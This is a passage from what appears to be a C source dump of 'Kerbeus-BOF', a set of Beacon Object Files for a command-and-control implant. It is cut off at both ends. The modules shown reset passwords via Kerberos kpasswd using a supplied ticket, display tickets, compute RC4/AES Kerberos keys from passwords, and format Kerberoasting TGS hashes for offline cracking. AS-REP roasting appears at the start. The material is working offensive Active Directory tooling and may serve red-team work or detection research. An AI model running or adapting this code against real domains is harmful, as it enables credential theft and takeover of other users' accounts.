    INIT_BOF();

    datap parser;
    BeaconDataParse(&parser, Buffer, Length);
    DWORD PARAM_SIZE = 0;
    PBYTE PARAM = BeaconDataExtract(&parser, &PARAM_SIZE);

    if( LoadFunc() )
        PRINT_OUT("%s\n", "Modules not loaded");
    else
        ASREPROAST_RUN( PARAM, PARAM_SIZE );

    FreeBank();

    END_BOF();
}

================================================
FILE: AD-BOF/Kerbeus-BOF/changepw/changepw.c
================================================
#include "_include/asn_decode.c"
#include "_include/asn_encode.c"
#include "_include/crypt_b64.c"
#include "_include/crypt_dec.c"
#include "_include/connection.c"

void ResetUserPassword(byte* ticket, char* newPassword, char* dc, char* targetUser, char* targetDomain) {
    int bytesSize = 0;
    byte* bytes = base64_decode(ticket, &bytesSize);

    KRB_CRED kirbi = { 0 };
    AsnElt   asn_KRB_CRED = { 0 };
    if (BytesToAsnDecode3(bytes, bytesSize, FALSE, &asn_KRB_CRED)) return;

    AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &kirbi);

    // extract the user and domain from the existing .kirbi ticket
    char* userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
    char* userDomain = kirbi.enc_part.ticket_info[0].prealm;

    if (targetUser && targetDomain)
        PRINT_OUT("[*] Resetting password for target user: %s@%s\n", targetUser, targetDomain);
    else
        PRINT_OUT("[*] Changing password for user: %s@%s\n", userName, userDomain);
    PRINT_OUT("[*] New password value: %s\n", newPassword);
    PRINT_OUT("[*] Building AP-REQ for the MS Kpassword request\n");

    AP_REQ ap_req = { 0 };

    ap_req.pvno = 5;
    ap_req.msg_type = KERB_AP_REQ;
    ap_req.ticket = kirbi.tickets[0];
    ap_req.keyUsage = KRB_KEY_USAGE_AP_REQ_AUTHENTICATOR;
    ap_req.key = kirbi.enc_part.ticket_info[0].key;

    if (my_copybuf(&(ap_req.authenticator.crealm), userDomain, my_strlen(userDomain) + 1)) return;

    ap_req.authenticator.cname.name_count = 1;
    ap_req.authenticator.cname.name_type = PRINCIPAL_NT_PRINCIPAL;
    ap_req.authenticator.cname.name_string = MemAlloc(sizeof(void*) * ap_req.authenticator.cname.name_count);
    if (!ap_req.authenticator.cname.name_string) {
        PRINT_OUT("[x] Failed alloc memory");
        return;
    }
    if (my_copybuf(&(ap_req.authenticator.cname.name_string[0]), userName, my_strlen(userName) + 1)) return;

    DateTime dt = GetGmTimeAdd(0);

    ap_req.authenticator.authenticator_vno = 5;
    ap_req.authenticator.ctime = dt;

    // generate a random session subkey
    ap_req.authenticator.subkey.key_type = kirbi.enc_part.ticket_info[0].key.key_type;
    if (ap_req.authenticator.subkey.key_type == rc4_hmac) {
        ap_req.authenticator.subkey.key_size = 16;
    }
    else if (ap_req.authenticator.subkey.key_type == aes256_cts_hmac_sha1) {
        ap_req.authenticator.subkey.key_size = 32;
    }
    else {
        PRINT_OUT("[X] Only rc4_hmac and aes256_cts_hmac_sha1 key hashes supported at this time!\n");
        return;
    }
    ap_req.authenticator.subkey.key_value = MemAlloc(ap_req.authenticator.subkey.key_size);
    ADVAPI32$SystemFunction036(ap_req.authenticator.subkey.key_value, ap_req.authenticator.subkey.key_size);

    char* b64key = base64_encode(ap_req.authenticator.subkey.key_value, ap_req.authenticator.subkey.key_size);
    PRINT_OUT("[*] base64(session subkey): %s\n", b64key);

    // Session key used for the KRB-PRIV structure
    ADVAPI32$SystemFunction036(&(ap_req.authenticator.seq_number), 4);

    PRINT_OUT("[*] Building the KRV-PRIV structure\n");
    KRB_PRIV changePriv = { 0 };
    changePriv.pvno = 5;
    changePriv.msg_type = 21;
    changePriv.ekey = ap_req.authenticator.subkey;

    // the new password to set for the user
    if (targetUser && targetDomain) {
        StrToUpper(targetDomain);
        if (my_copybuf(&(changePriv.enc_part.username), targetUser, my_strlen(targetUser) + 1)) return ;
        if (my_copybuf(&(changePriv.enc_part.realm), targetDomain, my_strlen(targetDomain) + 1)) return ;
    }
    if (my_copybuf(&(changePriv.enc_part.new_password), newPassword, my_strlen(newPassword) + 1)) return ;
    if (my_copybuf(&(changePriv.enc_part.host_name), "lol", 4)) return ;

    // now build the final MS Kpasswd request
    AsnElt apreqAsn = { 0 };
    if (AsnApReqEncode(&ap_req, &apreqAsn))return ;
    byte* apReqBytes = NULL;
    int apReqBytesSize = 0;
    if (AsnToBytesEncode(&apreqAsn, &apReqBytesSize, &apReqBytes))return ;

    AsnElt changePrivAsn = { 0 };
    if (AsnKrbPrivEncode(&changePriv, &changePrivAsn)) return ;
    byte* changePrivBytes = NULL;
    int changePrivBytesSize = 0;
    if (AsnToBytesEncode(&changePrivAsn, &changePrivBytesSize, &changePrivBytes));

    short messageLength = (short)(apReqBytesSize + changePrivBytesSize + 6);
    short version = -128;

    byte* sendArray = MemAlloc(messageLength);
    sendArray[0] = ((byte*)(&messageLength))[1];
    sendArray[1] = ((byte*)(&messageLength))[0];
    sendArray[2] = ((byte*)(&version))[1];
    sendArray[3] = ((byte*)(&version))[0];
    sendArray[4] = ((byte*)(&apReqBytesSize))[1];
    sendArray[5] = ((byte*)(&apReqBytesSize))[0];
    MemCpy(sendArray + 6, apReqBytes, apReqBytesSize);
    MemCpy(sendArray + 6 + apReqBytesSize, changePrivBytes, changePrivBytesSize);

    // KPASSWD_DEFAULT_PORT = 464
    byte* response = NULL;
    int   responseSize = 0;
    sendBytes(dc, "464", sendArray, messageLength, &response, &responseSize);
    if (responseSize < 2)
        return ;

    short respMsgLen = 0;
    short respAPReqLen = 0;
    short respKRBPrivLen = 0;
    ((byte*)(&respMsgLen))[1] = response[0];
    ((byte*)(&respMsgLen))[0] = response[1];
    if (respMsgLen == (short)responseSize && respMsgLen > 6) {
        ((byte*)(&respAPReqLen))[1] = response[4];
        ((byte*)(&respAPReqLen))[0] = response[5];
        if (respMsgLen > 6 + respAPReqLen) {
            respKRBPrivLen = respMsgLen - 6 - respAPReqLen;

            // decode the KRB-PRIV response
            AsnElt respKRBPrivAsn = { 0 };
            if (BytesToAsnDecode3(response + 6 + respAPReqLen, respKRBPrivLen, FALSE, &respKRBPrivAsn)) return ;

            for (int i = 0; i < respKRBPrivAsn.sub[0].subCount;i++) {
                AsnElt elem = respKRBPrivAsn.sub[0].sub[i];

                if (elem.tagValue == 3) {

                    byte* encBytes = NULL;
                    int encBytesSize = 0;
                    if (AsnGetOctetString(&(elem.sub[0].sub[1]), &encBytes, &encBytesSize)) break;
                    byte* decBytes = NULL;
                    int decBytesSize = 0;
                    if (decrypt(ap_req.authenticator.subkey.key_value, ap_req.authenticator.subkey.key_type, KRB_KEY_USAGE_KRB_PRIV_ENCRYPTED_PART, encBytes, encBytesSize, &decBytes, &decBytesSize)) break;
                    AsnElt decBytesAsn = { 0 };
                    if (BytesToAsnDecode3(decBytes, decBytesSize, FALSE, &decBytesAsn)) break;

                    byte* responseCodeBytes = NULL;
                    int responseCodeBytesSize = 0;
                    if (AsnGetOctetString(&(decBytesAsn.sub[0].sub[0].sub[0]), &responseCodeBytes, &responseCodeBytesSize)) break;

                    if (responseCodeBytesSize > 1) {
                        short resultCode = 0;
                        ((byte*)(&resultCode))[1] = responseCodeBytes[0];
                        ((byte*)(&resultCode))[0] = responseCodeBytes[1];

                        if (resultCode == 0) {
                            PRINT_OUT("\n[+] Password change success!\n");
                            return;
                        }
                        else {
                            char* resultError = "";

                            if (responseCodeBytesSize > 4) {
                                if (responseCodeBytes[2] == 0 && responseCodeBytes[3] == 0) {
                                    int minPasswordLen = responseCodeBytes[7];
                                    int passwordHistory = responseCodeBytes[11];
                                    INT64 expire = 0, min_passwordage = 0;
                                    ((byte*)(&expire))[7] = responseCodeBytes[16];
                                    ((byte*)(&expire))[6] = responseCodeBytes[17];
                                    ((byte*)(&expire))[5] = responseCodeBytes[18];
                                    ((byte*)(&expire))[4] = responseCodeBytes[19];
                                    ((byte*)(&expire))[3] = responseCodeBytes[20];
                                    ((byte*)(&expire))[2] = responseCodeBytes[21];
                                    ((byte*)(&expire))[1] = responseCodeBytes[22];
                                    ((byte*)(&expire))[0] = responseCodeBytes[23];
                                    ((byte*)(&min_passwordage))[7] = responseCodeBytes[24];
                                    ((byte*)(&min_passwordage))[6] = responseCodeBytes[25];
                                    ((byte*)(&min_passwordage))[5] = responseCodeBytes[26];
                                    ((byte*)(&min_passwordage))[4] = responseCodeBytes[27];
                                    ((byte*)(&min_passwordage))[3] = responseCodeBytes[28];
                                    ((byte*)(&min_passwordage))[2] = responseCodeBytes[29];
                                    ((byte*)(&min_passwordage))[1] = responseCodeBytes[30];
                                    ((byte*)(&min_passwordage))[0] = responseCodeBytes[31];

                                    int exp = expire / 0xc92a69c000;
                                    int mp = min_passwordage / 0xc92a69c000;

                                    PRINT_OUT("\n[X] Password change error: %s\n", lookupKadminErrorCode(resultCode));
                                    PRINT_OUT("\tMinimum Password Length: %d\n", minPasswordLen);
                                    PRINT_OUT("\tPassword History: %d\n", passwordHistory);
                                    PRINT_OUT("\tExpiry: %d day(s)\n", exp);
                                    PRINT_OUT("\tMinimum Password Age: %d day(s)\n", mp);
                                }
                                else {
                                    PRINT_OUT("\n[X] Password change error: %s %s\n", lookupKadminErrorCode(resultCode), responseCodeBytes + 2);
                                }
                            }
                            else {
                                PRINT_OUT("\n[X] Password change error: %s\n", lookupKadminErrorCode(resultCode));
                            }
                        }
                    }
                }
            }
        }
    }
    PRINT_OUT("\n[x] Password not changed.\n");
}

void CHANGEPW_RUN( PCHAR Buffer, DWORD Length ) {
    PRINT_OUT("[*] Action: Reset User Password\n");

    char* dc           = NULL;
    char* targetUser   = NULL;
    char* targetDomain = NULL;
    char* newPassword  = NULL;
    byte* ticket       = NULL;

    for (int i = 0; i < Length; i++) {
        i += GetStrParam(Buffer + i, Length - i, "/dc:", 4, &dc);
        i += GetStrParam(Buffer + i, Length - i, "/ticket:", 8, &ticket);
        i += GetStrParam(Buffer + i, Length - i, "/targetuser:", 12, &targetUser);
        i += GetStrParam(Buffer + i, Length - i, "/targetdomain:", 14, &targetDomain);
        i += GetStrParam(Buffer + i, Length - i, "/new:", 5, &newPassword);
    }

    GetDomainInfo(NULL, &dc);
    if (dc == NULL) {
        PRINT_OUT("[X] Could not retrieve domain information!\n\n");
        return;
    }

    if (newPassword == NULL) {
        PRINT_OUT("\n[X] New password must be supplied with /new:X !\n");
        return;
    }

    if (ticket)
        ResetUserPassword(ticket, newPassword, dc, targetUser, targetDomain);
    else
        PRINT_OUT("\n[X] A /ticket:X needs to be supplied!\n");
}

VOID go( IN PCHAR Buffer, IN ULONG Length ) {
    INIT_BOF();

    datap parser;
    BeaconDataParse(&parser, Buffer, Length);
    DWORD PARAM_SIZE = 0;
    PBYTE PARAM = BeaconDataExtract(&parser, &PARAM_SIZE);

    if( LoadFunc() )
        PRINT_OUT("%s\n", "Modules not loaded");
    else
        CHANGEPW_RUN( PARAM, PARAM_SIZE );

    FreeBank();

    END_BOF();
}

================================================
FILE: AD-BOF/Kerbeus-BOF/describe/describe.c
================================================
#include "_include/asn_decode.c"
#include "_include/crypt_b64.c"

void DisplayTicket( KRB_CRED cred, int indentLevel ) {
    DateTime starttime = cred.enc_part.ticket_info[0].starttime;
    DateTime endtime = cred.enc_part.ticket_info[0].endtime;
    DateTime renew_till = cred.enc_part.ticket_info[0].renew_till;
    uint flags = cred.enc_part.ticket_info[0].flags;

    if (cred.enc_part.ticket_info[0].sname.name_count == 1)
        PRINT_OUT("  ServiceName              :  %s\n", cred.enc_part.ticket_info[0].sname.name_string[0]);
    else if (cred.enc_part.ticket_info[0].sname.name_count > 1)
        PRINT_OUT("  ServiceName              :  %s/%s\n", cred.enc_part.ticket_info[0].sname.name_string[0], cred.enc_part.ticket_info[0].sname.name_string[1]);

    PRINT_OUT("  ServiceRealm             :  %s\n", cred.enc_part.ticket_info[0].srealm);

    if (cred.enc_part.ticket_info[0].pname.name_count == 1)
        PRINT_OUT("  UserName                 :  %s\n", cred.enc_part.ticket_info[0].pname.name_string[0]);
    else if (cred.enc_part.ticket_info[0].pname.name_count > 1)
        PRINT_OUT("  UserName                 :  %s@%s\n", cred.enc_part.ticket_info[0].pname.name_string[0], cred.enc_part.ticket_info[0].pname.name_string[1]);

    PRINT_OUT("  UserRealm                :  %s\n", cred.enc_part.ticket_info[0].prealm);
    PRINT_OUT("  StartTime (UTC)          :  %02d.%02d.%04d %d:%d:%d\n", starttime.day, starttime.month, starttime.year, starttime.hour, starttime.minute, starttime.second);
    PRINT_OUT("  EndTime (UTC)            :  %02d.%02d.%04d %d:%d:%d\n", endtime.day, endtime.month, endtime.year, endtime.hour, endtime.minute, endtime.second);
    PRINT_OUT("  RenewTill (UTC)          :  %02d.%02d.%04d %d:%d:%d\n", renew_till.day, renew_till.month, renew_till.year, renew_till.hour, renew_till.minute, renew_till.second);

    PRINT_OUT("  Flags                    :  ");
    if (flags & reserved)		PRINT_OUT("reserved ");
    if (flags & forwardable)	PRINT_OUT("forwardable ");
    if (flags & forwarded)		PRINT_OUT("forwarded ");
    if (flags & proxiable)		PRINT_OUT("proxiable ");
    if (flags & proxy)			PRINT_OUT("proxy ");
    if (flags & may_postdate)	PRINT_OUT("may_postdate ");
    if (flags & postdated)		PRINT_OUT("postdated ");
    if (flags & invalid)		PRINT_OUT("invalid ");
    if (flags & renewable)		PRINT_OUT("renewable ");
    if (flags & initial)		PRINT_OUT("initial ");
    if (flags & pre_authent)	PRINT_OUT("pre_authent ");
    if (flags & hw_authent)		PRINT_OUT("hw_authent ");
    if (flags & ok_as_delegate) PRINT_OUT("ok_as_delegate ");
    if (flags & anonymous)		PRINT_OUT("anonymous ");
    if (flags & enc_pa_rep)		PRINT_OUT("enc_pa_rep ");
    if (flags & reserved1)		PRINT_OUT("reserved1 ");
    PRINT_OUT("\n");

    if (cred.enc_part.ticket_info[0].key.key_type == rc4_hmac)
        PRINT_OUT("  KeyType                  :  rc4_hmac\n");
    else if (cred.enc_part.ticket_info[0].key.key_type == aes128_cts_hmac_sha1)
        PRINT_OUT("  KeyType                  :  aes128_cts_hmac_sha1\n");
    else if (cred.enc_part.ticket_info[0].key.key_type == aes256_cts_hmac_sha1)
        PRINT_OUT("  KeyType                  :  aes256_cts_hmac_sha1\n");
}

void DescribeTicket(byte* ticket_b64) {
    int bytesSize = 0;
    byte* bytes = base64_decode(ticket_b64, &bytesSize);

    KRB_CRED kirbi = { 0 };
    AsnElt   asn_KRB_CRED = { 0 };
    if (BytesToAsnDecode3(bytes, bytesSize, false, &asn_KRB_CRED)) return;
    if (AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &kirbi)) return;
    DisplayTicket(kirbi, 2);
}

void DESCRIBE_RUN( PCHAR Buffer, IN DWORD Length ) {
    PRINT_OUT("[*] Action: Describe ticket\n\n");

    char* ticket = NULL;
    for (int i = 0; i < Length; i++)
        i += GetStrParam(Buffer + i, Length - i, "/ticket:", 8, &ticket );

    if (ticket)
        DescribeTicket(ticket);
    else
        PRINT_OUT("[X] You must supply a /ticket!\n\n");
}

VOID go( IN PCHAR Buffer, IN ULONG Length ) {
    INIT_BOF();

    datap parser;
    BeaconDataParse(&parser, Buffer, Length);
    DWORD PARAM_SIZE = 0;
    PBYTE PARAM = BeaconDataExtract(&parser, &PARAM_SIZE);

    if( LoadFunc() )
        PRINT_OUT("%s\n", "Modules not loaded");
    else
        DESCRIBE_RUN( PARAM, PARAM_SIZE );

    FreeBank();

    END_BOF();
}

================================================
FILE: AD-BOF/Kerbeus-BOF/hash/hash.c
================================================
#include "_include/functions.c"
#include "_include/crypt_key.c"

void GenerateHashes(char* user, char* domain, char* password) {
    PRINT_OUT("[*] Input Password           : %s\n", password);
    if (user && domain) {
        PRINT_OUT("[*] Input Username           : %s\n", user);
        PRINT_OUT("[*] Input Domain             : %s\n", domain);
    }

    int   rc4_hash_size = 0;
    byte* rc4_hash = 0;
    if (!get_key_rc4(password, &rc4_hash, &rc4_hash_size)) {
        int hexHashLength = rc4_hash_size * 2 + 1;
        char* hex_hash = MemAlloc(hexHashLength);
        my_tohex(rc4_hash, rc4_hash_size, &hex_hash, hexHashLength);
        PRINT_OUT("[*]     rc4_hmac             : %s\n", hex_hash);
    }
    if (user && domain) {
        int   aes128_hash_size = 0;
        byte* aes128_hash = 0;
        if (!get_key_aes128(domain, user, password, &aes128_hash, &aes128_hash_size)) {
            int hexHashLength = aes128_hash_size * 2 + 1;
            char* hex_hash = MemAlloc(hexHashLength);
            my_tohex(aes128_hash, aes128_hash_size, &hex_hash, hexHashLength);
            PRINT_OUT("[*]     aes128_cts_hmac_sha1 : %s\n", hex_hash);
        }

        int   aes256_hash_size = 0;
        byte* aes256_hash = 0;
        if (!get_key_aes256(domain, user, password, &aes256_hash, &aes256_hash_size)) {
            int hexHashLength = aes256_hash_size * 2 + 1;
            char* hex_hash = MemAlloc(hexHashLength);
            my_tohex(aes256_hash, aes256_hash_size, &hex_hash, hexHashLength);
            PRINT_OUT("[*]     aes256_cts_hmac_sha1 : %s\n", hex_hash);
        }
    }
}

void HASH_RUN( PCHAR Buffer, IN DWORD Length ) {
    PRINT_OUT("[*] Action: Calculate Password Hash(es)\n\n");

    char* user = NULL;
    char* domain = NULL;
    char* password = NULL;

    for (int i = 0; i < Length; i++) {
        i += GetStrParam(Buffer + i, Length - i, "/user:", 6, &user );
        i += GetStrParam(Buffer + i, Length - i, "/domain:", 8, &domain );
        i += GetStrParam(Buffer + i, Length - i, "/password:", 10, &password );
    }

    if (password)
        GenerateHashes(user, domain, password);
    else
        PRINT_OUT("[X] /password:X must be supplied!\n");
}

VOID go( IN PCHAR Buffer, IN ULONG Length ) {
    INIT_BOF();

    datap parser;
    BeaconDataParse(&parser, Buffer, Length);
    DWORD PARAM_SIZE = 0;
    PBYTE PARAM = BeaconDataExtract(&parser, &PARAM_SIZE);

    if( LoadFunc() )
        PRINT_OUT("%s\n", "Modules not loaded");
    else
        HASH_RUN( PARAM, PARAM_SIZE );

    FreeBank();

    END_BOF();
}

================================================
FILE: AD-BOF/Kerbeus-BOF/kerberoasting/kerberoasting.c
================================================
#include "_include/asn_encode.c"
#include "_include/asn_decode.c"
#include "_include/crypt_b64.c"
#include "_include/crypt_dec.c"
#include "_include/connection.c"

void DisplayTGShash(KRB_CRED cred, BOOL kerberoastDisplay, char* kerberoastUser, char* kerberoastDomain) {
    int encType = cred.tickets[0].enc_part.etype;
    int snameLenth = 0;
    for (int i = 0; i < cred.enc_part.ticket_info[0].sname.name_count; i++) {
        snameLenth += my_strlen(cred.enc_part.ticket_info[0].sname.name_string[i]) + 1;
    }

    int index = 0;
    char* sname = MemAlloc(snameLenth);
    for (int i = 0; i < cred.enc_part.ticket_info[0].sname.name_count; i++) {
        int l = my_strlen(cred.enc_part.ticket_info[0].sname.name_string[i]);
        MemCpy(sname + index, cred.enc_part.ticket_info[0].sname.name_string[i], l);
        index += l;
        sname[index++] = '/';
    }
    sname[--snameLenth] = 0;


    int kerberoastUserLength = my_strlen(kerberoastUser);
    int kerberoastDomainLength = my_strlen(kerberoastDomain);
    int hashStringLength = 19 + kerberoastUserLength + kerberoastDomainLength + snameLenth + cred.tickets[0].enc_part.cipher_size * 2;
    char* hashString = MemAlloc(hashStringLength);

    if (encType == 18 || encType == 17) {
        MemCpy(hashString, "$krb5tgs$17$", 12);
        MemCpy(hashString + 12, kerberoastUser, kerberoastUserLength);
        hashString[12 + kerberoastUserLength] = '$';
        MemCpy(hashString + 13 + kerberoastUserLength, kerberoastDomain, kerberoastDomainLength);
        MemCpy(hashString + 13 + kerberoastUserLength + kerberoastDomainLength, "$*", 2);
        MemCpy(hashString + 15 + kerberoastUserLength + kerberoastDomainLength, sname, snameLenth);
        MemCpy(hashString + 15 + kerberoastUserLength + kerberoastDomainLength + snameLenth, "*$", 2);

        char* c1 = hashString + 17 + kerberoastUserLength + kerberoastDomainLength + snameLenth;
        my_tohex(cred.tickets[0].enc_part.cipher + cred.tickets[0].enc_part.cipher_size - 12, 12, &c1, 25);
        hashString[17 + kerberoastUserLength + kerberoastDomainLength + snameLenth + 24] = '$';
        char* c2 = hashString + 18 + kerberoastUserLength + kerberoastDomainLength + snameLenth + 24;
        my_tohex(cred.tickets[0].enc_part.cipher, cred.tickets[0].enc_part.cipher_size - 12, &c2, (cred.tickets[0].enc_part.cipher_size - 12) * 2 + 1);

        if (encType == 18)
            hashString[10] = '8';
    }
    else {
        MemCpy(hashString, "$krb5tgs$23$*", 13);
        MemCpy(hashString + 13, kerberoastUser, kerberoastUserLength);
        hashString[13 + kerberoastUserLength] = '$';
        MemCpy(hashString + 14 + kerberoastUserLength, kerberoastDomain, kerberoastDomainLength);
        hashString[14 + kerberoastUserLength + kerberoastDomainLength] = '$';
        MemCpy(hashString + 15 + kerberoastUserLength + kerberoastDomainLength, sname, snameLenth);
        MemCpy(hashString + 15 + kerberoastUserLength + kerberoastDomainLength + snameLenth, "*$", 2);

        char* c1 = hashString + 17 + kerberoastUserLength + kerberoastDomainLength + snameLenth;
        my_tohex(cred.tickets[0].enc_part.cipher, 16, &c1, 33);
        hashString[17 + kerberoastUserLength + kerberoastDomainLength + snameLenth + 32] = '$';
        char* c2 = hashString + 18 + kerberoastUserLength + kerberoastDomainLength + snameLenth + 32;
        my_tohex(cred.tickets[0].enc_part.cipher + 16, cred.tickets[0].enc_part.cipher_size - 16, &c2, (cred.tickets[0].enc_part.cipher_size - 16) * 2 + 1);
    }

    PRINT_OUT("\n%s\n", hashString);
}

BOOL New_PA_DATA(char* crealm, char* cname, Ticket providedTicket, EncryptionKey clientKey, BOOL opsec, byte* req_body, int req_body_length, PA_DATA* pa_data) {

    AP_REQ* ap_req = MemAlloc(sizeof(AP_REQ));
    if (!ap_req) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    ap_req->pvno = 5;
    ap_req->msg_type = KERB_AP_REQ;
    ap_req->ap_options = 0;
    ap_req->ticket = providedTicket;
    ap_req->keyUsage = KRB_KEY_USAGE_TGS_REQ_PA_AUTHENTICATOR;
    ap_req->key = clientKey;

    DateTime dt = GetGmTimeAdd(0);

    if (my_copybuf(&(ap_req->authenticator.crealm), crealm, my_strlen(crealm) + 1)) return TRUE;

    ap_req->authenticator.authenticator_vno = 5;
    ap_req->authenticator.ctime = dt;
    ap_req->authenticator.cname.name_count = 1;
    ap_req->authenticator.cname.name_type = PRINCIPAL_NT_PRINCIPAL;
    ap_req->authenticator.cname.name_string = MemAlloc(sizeof(void*) * ap_req->authenticator.cname.name_count);
    if (!ap_req->authenticator.cname.name_string) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    if (my_copybuf(&(ap_req->authenticator.cname.name_string[0]), cname, my_strlen(cname) + 1)) return TRUE;

    pa_data->type = PADATA_AP_REQ;
    pa_data->value = ap_req;
    return FALSE;
}

BOOL NewTGS_REP(AsnElt asn_TGS_REP, TGS_REP* tgs_rep) {
    if (asn_TGS_REP.tagValue != KERB_TGS_REP) {
        PRINT_OUT("TGS-REP tag value should be 13");
        return TRUE;
    }
    if ((asn_TGS_REP.subCount != 1) || (asn_TGS_REP.sub[0].tagValue != 16)) {
        PRINT_OUT("First TGS-REP sub should be a sequence");
        return TRUE;
    }

    // extract the KDC-REP out
    AsnElt* kdc_rep = asn_TGS_REP.sub[0].sub;
    for (int i = 0; i < asn_TGS_REP.sub[0].subCount; i++) {
        int tagValue = kdc_rep[i].tagValue;
        if ( tagValue == 0 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(tgs_rep->pvno))) return TRUE;
        }
        if ( tagValue == 1 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(tgs_rep->msg_type))) return TRUE;
        }
        if ( tagValue == 2 ) {
            if (AsnGetPaData(&(kdc_rep[i].sub[0]), &(tgs_rep->padata))) return TRUE;
        }
        if ( tagValue == 3 ) {
            if (AsnGetString(&(kdc_rep[i].sub[0]), &(tgs_rep->crealm))) return TRUE;
        }
        if ( tagValue == 4 ) {
            if (AsnGetPrincipalName(&(kdc_rep[i].sub[0]), &(tgs_rep->cname))) return TRUE;
        }
        if ( tagValue == 5 ) {
            if (AsnGetTicket(&(kdc_rep[i].sub[0].sub[0]), &(tgs_rep->ticket))) return TRUE;
        }
        if ( tagValue == 6 ) {
            if (AsnGetEncryptedData(&(kdc_rep[i].sub[0]), &(tgs_rep->enc_part))) return TRUE;
        }
    }
    return FALSE;
}

BOOL NewAS_REP(AsnElt asn_AS_REP, AS_REP* as_rep) {
    // AS-REP::= [APPLICATION 11] KDC-REQ
    if ((asn_AS_REP.subCount != 1) || (asn_AS_REP.sub[0].tagValue != 16)) {
        PRINT_OUT("First AS-REP sub should be a sequence");
        return TRUE;
    }

    AsnElt* kdc_rep = asn_AS_REP.sub[0].sub;

    for (int i = 0; i < asn_AS_REP.sub[0].subCount; i++) {
        int tagValue = kdc_rep[i].tagValue;
        if ( tagValue == 0 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(as_rep->pvno))) return TRUE;
        }
        if ( tagValue == 1 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(as_rep->msg_type)))return TRUE;
        }
        if ( tagValue == 2 ) {
            as_rep->pa_data_count = kdc_rep[i].subCount;
            as_rep->pa_data = MemAlloc(as_rep->pa_data_count);
            for (int j = 0; j < as_rep->pa_data_count; j++) {
                PA_DATA padata = { 0 };
                if (AsnGetPaData(&(kdc_rep[i].sub[j].sub[0]), &padata)) return TRUE;
                as_rep->pa_data[j] = padata;
            }
        }
        if ( tagValue == 3 ) {
            if (AsnGetString(&(kdc_rep[i].sub[0]), &(as_rep->crealm))) return TRUE;
        }
        if ( tagValue == 4 ) {
            if (AsnGetPrincipalName(&(kdc_rep[i].sub[0]), &(as_rep->cname))) return TRUE;
        }
        if ( tagValue == 5 ) {
            if (kdc_rep[i].sub[0].subCount)
                if (AsnGetTicket(&(kdc_rep[i].sub[0].sub[0]), &(as_rep->ticket))) return TRUE;
        }
        if ( tagValue == 6 ) {
            if (AsnGetEncryptedData(&(kdc_rep[i].sub[0]), &(as_rep->enc_part))) return TRUE;
        }
    }
    kdc_rep = NULL;
    return FALSE;
}

BOOL NewTGS_REQ(char* userName, char* domain, char* sname, Ticket providedTicket, EncryptionKey clientKey, int requestEType, byte* tgs, BOOL opsec, BOOL u2u, BOOL unconstrained, char* targetDomain, char* s4uUser, BOOL keyList, BOOL renew, byte** reqBytes, int* reqBytesSize) {
    AS_REQ req = { 0 };

    req.pvno = 5;
    req.msg_type = 12;

    req.req_body.kdc_options = FORWARDABLE | RENEWABLE | RENEWABLEOK;
    req.req_body.till = 24 * 3600;		 // valid for 1h
    ADVAPI32$SystemFunction036(&(req.req_body.nonce), 4);

    req.req_body.cname.name_type = PRINCIPAL_NT_PRINCIPAL;
    req.req_body.cname.name_count = 1;
    req.req_body.cname.name_string = MemAlloc(sizeof(void*) * req.req_body.cname.name_count);
    if (!req.req_body.cname.name_string) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    if (my_copybuf(&(req.req_body.cname.name_string[0]), userName, my_strlen(userName) + 1)) return TRUE;

    int partsCount = 0;
    char** parts = my_strsplit( sname, '/', &partsCount );

    if (my_copybuf(&req.req_body.realm, targetDomain, my_strlen(targetDomain) + 1)) return TRUE;
    StrToUpper(req.req_body.realm);

    int etypeIndex = 0;
    req.req_body.etypes_count = 1;
    req.req_body.etypes = MemAlloc(sizeof(int) * req.req_body.etypes_count);
    if (!req.req_body.etypes) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    req.req_body.etypes[etypeIndex++] = requestEType;

        if (partsCount == 1) {
            // service and other unique instance (e.g. krbtgt)
            req.req_body.sname.name_type = PRINCIPAL_NT_SRV_INST;
            req.req_body.sname.name_count = 2;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), parts[0], my_strlen(parts[0]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[1]), domain, my_strlen(domain) + 1);
        }
        else if (partsCount == 2) {
            req.req_body.sname.name_type = PRINCIPAL_NT_SRV_INST;
            req.req_body.sname.name_count = 2;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), parts[0], my_strlen(parts[0]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[1]), parts[1], my_strlen(parts[1]) + 1);
        }
        else if (partsCount == 3) {
            //      SPN (sname/server.domain.com/blah)
            req.req_body.sname.name_type = PRINCIPAL_NT_SRV_HST;
            req.req_body.sname.name_count = 3;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), parts[0], my_strlen(parts[0]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[1]), parts[1], my_strlen(parts[1]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[2]), parts[2], my_strlen(parts[2]) + 1);
        }
        else {
            PRINT_OUT("[X] Error: invalid TGS_REQ sname '%s'\n", sname);
        }

    byte* cksum_Bytes = NULL;
    int cksum_Bytes_length = 0;


    // create the PA-DATA that contains the AP-REQ w/ appropriate authenticator/etc.
    PA_DATA padata = { 0 };
    if (New_PA_DATA(domain, userName, providedTicket, clientKey, opsec, cksum_Bytes, cksum_Bytes_length, &padata)) return TRUE;

    req.pa_data_count = 1 + (opsec && s4uUser) + (s4uUser || opsec || (tgs && !u2u)) + keyList;
    int padata_index = 0;
    req.pa_data = MemAlloc(req.pa_data_count * sizeof(PA_DATA));
    req.pa_data[padata_index++] = padata;

    // Add PA-DATA for KeyList request
    AsnElt reqAsn = { 0 };
    if (ReqToAsnEncode(req, 12, &reqAsn)) return TRUE;
